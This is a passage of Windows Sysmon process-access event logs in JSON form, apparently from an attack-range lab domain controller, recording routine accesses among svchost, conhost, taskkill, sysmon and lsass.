{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.641\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\system32\\taskkill.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.641","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\system32\\taskkill.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\system32\\taskkill.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\system32\\taskkill.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 